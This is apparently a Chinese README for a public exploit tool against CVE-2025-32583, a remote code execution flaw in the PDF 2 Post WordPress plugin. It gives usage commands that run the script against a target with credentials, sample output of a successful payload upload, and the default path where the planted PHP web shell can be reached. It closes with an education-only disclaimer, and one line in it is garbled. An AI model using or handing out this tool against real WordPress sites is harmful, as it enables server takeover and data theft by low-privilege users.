严重漏洞
CVE 编号: CVE-2025-32583
严重性: 9.9(严重)
CVSS 向量:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
PDF 2 Post WordPress 插件(由 termel 开发)中存在一个漏洞,由于对代码生成的掌控不当,导致远程代码包含(RCE)。
受影响版本:<= 2.4.0
该漏洞允许已认证用户(即使是低权限用户)上传包含 PHP 代码的 .zip 文件。插件解压后,恶意 PHP 文件可通过公开的 uploads 目录在远程执行。
Nxploited.zipnonce 令牌载荷上传后,PHP Shell 将被解压到 WordPress 的 uploads 文件夹中。
🛠️ 默认路径:
/wp-content/uploads/YYYY/MM/nxploited.php
例如,如果在 2025 年 5 月 利用,URL 将是:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPress 会自动按年/月组织上传文件,因此请根据当前日期检查正确的文件夹。
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
本工具仅用于教育和经授权的渗透测试。
严禁将本代码用于任何未经授权的活动。
作者对任何损害或误用概不负责。
作者:Khaled_alenazi (Nxploited)